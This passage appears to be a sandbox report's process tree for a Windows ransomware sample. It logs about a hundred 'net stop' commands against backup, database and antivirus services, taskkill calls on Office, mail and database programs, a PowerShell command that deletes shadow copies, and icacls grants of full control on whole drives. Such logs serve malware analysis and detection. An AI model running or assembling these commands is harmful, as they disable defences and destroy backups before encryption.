    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:2448
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:3872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:5252
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:4276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:2528
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:4712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:3280
- C:\Windows\system32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:4704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:2876
- C:\Windows\system32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:4720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:1484
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:4552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:8136
- C:\Windows\system32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:4544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:1836
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:4536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:8152
- C:\Windows\system32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:4528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:6840
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:4516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:1012
- C:\Windows\system32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:4508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:6636
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:4500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:8144
- C:\Windows\system32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:4492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:6268
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:5460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    3⤵
    PID:6828
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:1740
- C:\Windows\system32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:5348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:1792
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:5340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:2204
- C:\Windows\system32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:5332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:7404
- C:\Windows\system32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:5324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:5648
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4732
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6444
- C:\Windows\system32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:4692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vapiendpoint /y
    3⤵
    PID:6204
- C:\Windows\system32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    3⤵
    PID:7416
- C:\Windows\system32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:2296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:3360
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:3900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:7324
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:4256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:6856
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:4328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:2572
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:4356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:1316
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:3592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:7992
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:2276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:2960
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:1624
- C:\Windows\system32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:4272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:5636
- C:\Windows\system32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:3340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:2412
- C:\Windows\system32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:5116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:6728
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:5108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5304
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:7752
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:5744
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:5752
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:5916
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:6008
- C:\Windows\system32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6028
- C:\Windows\system32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6048
- C:\Windows\system32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6056
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:6000
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:5992
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:5984
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:5976
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:5968
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:5960
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:5952
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:5944
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:5936
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:5928
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:5900
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:5892
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:5884
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:5876
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:5868
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:5860
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:5852
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:5844
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:5836
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:5828
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:5820
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:5812
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:5804
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:5796
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:5788
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:5780
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:5772
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:5764
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:5736
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:5728
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:5720
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:5712
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:5704
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:5696
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:5688
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:5680
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:5672
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:5664
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5656
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:5648
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5640
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:5632
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:5624
- C:\Windows\system32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:5616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:7888
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:5608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:7332
- C:\Windows\system32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:5592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:8000
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:5584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:8068
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:7456
- C:\Windows\system32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:5568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:6092
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:5560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:7984
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:8052
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:5096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:6748
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:7304
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:5076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:6556
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:5068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:2344
- C:\Windows\system32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:5060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:5912
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:7672
- C:\Windows\system32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:5044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:8044
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:5036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:700
- C:\Windows\system32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:5028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:5320
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:5020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:7880
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:5008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:1644
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:5000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:7296
- C:\Windows\system32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:4988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:2664
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:4972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:5252
- C:\Windows\system32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:4960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:3384
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:7288
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:4928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:7728
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:4484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:6928
- C:\Windows\system32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:4476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:1636
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:4464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:8128
- C:\Windows\system32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:4452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:2188
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:4440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:8160
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:4424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:2456
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:4416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:7028
- C:\Windows\system32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:4392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sms_site_sql_backup /y
    3⤵
    PID:8036
- C:\Windows\system32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:4372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:1572
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.38
  2⤵
  PID:6428
- C:\Windows\system32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:4292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:1048
- C:\Windows\system32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:4260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:2796
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:4236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:4320
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:4228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:7412
- C:\Windows\system32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:4220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:7920
- C:\Windows\system32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:4212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:5844
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:4204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:4720
- C:\Windows\system32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:4196
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:6796
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:4188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:7704
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:4180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:2412
- C:\Windows\system32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:4168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:8116
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:4160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:6188
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:4152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3120
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:4144
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:2024
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:4136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:8016
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:4128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:7036
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:4120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:7712
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:4112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:3436
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:4100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:8100
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:2688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:8076
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:1496
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:4064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:1672
- C:\Windows\system32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:4044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:3568
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:3308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:8092
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:1612
- C:\Windows\system32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:3132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:7968
- C:\Windows\system32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:3736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:7800
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:3356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:3884
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:7720
- C:\Windows\system32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:3600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:5140
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:7252
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:2248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:8108
- C:\Windows\system32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:2908
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:7928
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:2912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:1484
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
